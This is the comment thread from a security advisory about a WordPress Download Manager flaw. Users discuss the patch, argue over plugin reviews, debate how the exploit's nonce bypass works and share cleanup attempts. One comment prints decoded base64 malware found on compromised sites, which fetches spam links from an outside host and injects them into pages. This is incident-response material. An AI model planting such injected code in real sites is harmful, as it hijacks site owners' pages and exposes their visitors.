Security Advisory – High Severity– WordPress Download Manager

17 comments

1. nice work 😉

2. Any idea if this vulnerability extends to the WordPress Download Manager Pro version?

   1. No, fixed already.

3. Mickael Nadeau informed me about the security issue. I’ve fixed and released v2.7.5, then he published it here. So, don’t worry, if you already updated to v2.7.5, but if you still using v2.7.4 or lower version, please update ASAP.

   1. Hopefully you fixed it without insulting all those who are leaving negative feedback on wordpress.org. They are leaving valid criticism – so maybe instead of insulting those who are taking issue with a bad update, take heed of what they are saying to you.

      1. Why would I insult. Every reviews, no matter good or bad, helping me to make this plugin better. But when someone writes a review they should be relevant, like when you face any issue, you should post in support forum first, if you don’t get any support, now can write your review, which will he helpful for the developer and community. If the situation is like this: someone using this plugin for last few year with full satisfaction and after an update when he faced a minor issue, he jumped in, who didn’t even have an account at wordpress.org, now opened an account just to write a irrelevant review without asking for help or even reading forum ( probably he even don’t know where the forum is, but he know where to leave a BAD review ), do you thinks that a fair way of leaving valid criticism or just throwing out anger, who never come here to tell something good for his last few years of good experience, but at first chance of trouble come here to shoot me?

         1. And you just proved my point. Seriously – anyone can go to wordpress.org and see the reviews and your responses. After reading them I wouldn’t touch anything associated with you because of your attitude towards your own users. Negative or not – they are your customers – treat them with at least a little respect and maybe they will return the favour.

            1. I understand what you saying, but as he is an user of my plugin ( not customer exactly, may be potential customer, even if he is already a customer ), he can’t behave unreasonably. Please read this http://pippinsplugins.com/how-to-leave-a-good-bad-review/ , I hope you will understand the total situation.

   2. Can anyone out there give me examples of where “out in the wild” backdoors are placed? I noticed a strange php file in my wp root directory that disappeared after I glanced at it. From looking what the code did (eff I accidentally closed it) it placed a wp-options.php into my /wp-admin/ directory then moved it out to the root directory. I actually reinstalled WordPress after I noticed it and didn’t grab any example code 🙁

      Right now I cleaned out all the base64 code but I’m looking for more backdoors. Has anyone else seen anything suspicious?

4. Yet another reason to read my Sucuri updates first thing in the morning instead of the afternoon. Thanks Mickael, for the heads up…off to look at some client sites. You folks are the best!

5. You rock, guys. Thanks!

6. Mickael or AHM Shanur : are YOU NOT the programmer of YOUR OWN Programm?
   Why did you do that? ?

7. “That said, as we could execute any function in the application’s
   context, nothing prevented us from calling the snippet of code
   generating that particular nonce first.”

   As far as I can see it is not possible to abuse the wpdm_ajax_call_exec() function to generate a valid nonce first. You would need to call wp_create_nonce(‘icon-upload’).

   The call_user_func($_POST[‘execute’], $_POST); command simply doesn’t allow you to do so.
   This because the $_POST data needs to be an array which at least contains:

   array(action=>’wpdm_ajax_call’,
   execute=>’wp_create_nonce’)

   So you cannot properly pass the argument value ‘icon-upload’ to the wp_create_nonce() function.

8. I have reason to believe that this may have hit my sites. I was curious as to what the base64 was, here it is decoded.

   function file_get_contents_curl($url) {

   $ch = curl_init();

   curl_setopt($ch, CURLOPT_HEADER, 0);

   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

   curl_setopt($ch, CURLOPT_URL, $url);

   curl_setopt($ch, CURLOPT_USERAGENT, “LOCALSAPE”);

   $data = curl_exec($ch);

   curl_close($ch);

   return $data;

   }

   $links = file_get_contents_curl(“http://wpcache-blogger.com/getlinks.php?apicode=lalala44&pageurl=”.urlencode(‘http://’.$_SERVER[‘SERVER_NAME’].$_SERVER[‘REQUEST_URI’]).”&useragent=”.urlencode($_SERVER[‘HTTP_USER_AGENT’]).””);

   echo $links;

   1. I’m attempting to clean this up with sed… and I’m not the best at escaping characters or getting sed to work the way I want it too…

      Lets say I want to clean up the mess…

      —————
      grep -lr –include=*.php “eval(base64_decode” /home/username/public_html/wp-content/themes/| xargs sed -i.bak ‘<?php ///* /*//eval(base64_decode(.*));///* /*// ?>//g’
      —————

      I get the following error:
      sed: -e expression #1, char 10: unknown command: `/’

      Crap, I thought everything between single quote was literal and you just escape $.*/[]^ with backslash?

9. Coincidentally I have Download Manager and RevSlider on a production instance. Here are some notes that I’ve thrown down from what I’ve found so far.

   http://pastebin.com/v42Rv9DF

   Includes frommshead.php and the code, 3 files that quarantined by maldec. I also cleaned up all the modified footer.php files. If anyone wants to see the code of the 3 backdoors I found I can always throw them up on pastebin.

10. Can we have the way you fix this security hole please. It would be nice to have the diff if we just want to apply the patch. In some case the source code HAS to be modified and I can’t upgrade it now. Thanks

Comments are closed.